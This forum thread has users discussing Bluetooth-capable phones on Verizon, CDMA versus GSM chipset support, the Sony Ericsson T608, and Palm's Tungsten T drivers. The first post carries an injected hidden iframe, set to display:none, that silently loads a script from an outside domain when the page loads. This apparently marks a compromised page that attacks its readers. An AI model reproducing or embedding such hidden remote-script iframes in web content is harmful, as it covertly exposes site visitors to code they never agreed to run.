Anyone know if Verizon has any bluetooth capable phones out at the moment? I think I saw one that requires a replacement back-pack or something, but couldn't find any specific details on it.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Yeah, that's the phone. I did a lookup on it, and the bluetooth pack is an extra $110. Haven't priced out the phone yet, but I don't think it's out of line price-wise. I emailed Palm regarding the Tungsten T and its bluetooth compatibility with this phone, so it'll be interesting to see how they respond back.
I recall reading some articles about how CDMA phones will be rather slow to adopt bluetooth. The problem is primarily related to the wireless chipsets available. Most (all?) CDMA chipsets are made by Qualcomm. Several chipsets are available from multiple manufacturers for GSM, and GSM is used by more carriers worldwide.
SO the current and near-term CDMA chipsets don't have Bluetooth support integrated. Some of the GSM ones do which is why we're starting to see integrated Bluetooth support on many GSM phones...

The Sony Ericsson T608 (due 2Q 2003) is a tri-mode CDMA cell phone with bluetooth built-in.

Is this coming from that Verizon phone roadmap that shows pics of phones to be released? That mentions a T606, which is not bluetooth capable. Unless you're referring to Sprint.
Palm emailed me back regarding TT bluetooth drivers, and the TT only supports a few GSM phones right now. They did however mention to keep checking back on thier site for new drivers.
